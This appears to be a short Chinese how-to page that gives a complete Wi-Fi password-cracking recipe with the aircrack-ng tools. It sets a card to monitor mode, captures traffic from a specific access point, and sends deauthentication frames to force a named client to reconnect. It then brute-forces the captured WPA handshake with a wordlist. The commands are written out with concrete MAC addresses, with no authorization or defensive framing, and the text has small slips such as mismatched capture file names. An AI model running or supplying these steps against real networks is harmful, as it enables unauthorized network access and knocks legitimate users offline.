利用Deauth验证攻击,强制让合法客户端与AP断开,此时客户端会自动尝试与AP重新连接,在重新连接的过程中,数据通信就产生了,然后利用airodump-ng捕获无线路由器与无线客户端4次握手的数据包。然后再利用字典进行暴力破解。
工具/原料
airodump-ng
步骤/方法
1
激活网卡 将网卡置于监控模式,并让其工作在6信道airmon-ng start wlan0 6
2
捕获数据包 捕获6信道的数据包airodump-ng --bssid 5C:63:BF:DC:61:8C -w 998 -c 6 mon0
3
3.Deauth验证攻击 进行Deauth验证攻击,强制断开合法无线客户端和AP直接的连接,使其重新进行连接aireplay-ng --deauth 15 -a 5C:63:BF:DC:61:8C -h 00:1A:73:7F:ED:86 mon01.--deauth deauth攻击2.-a 无线AP的MAC地址3.-h 合法客户端的MAC地址
4
字典破解 使用aircrack-ng对其进行破解aircrack-ng -w password.txt sybell*.cap
注意事项
利用airodump-ng捕获无线路由器与无线客户端4次握手的数据包
上一篇:网站打不开怎么办?
下一篇:某个网址或网站打不开怎么办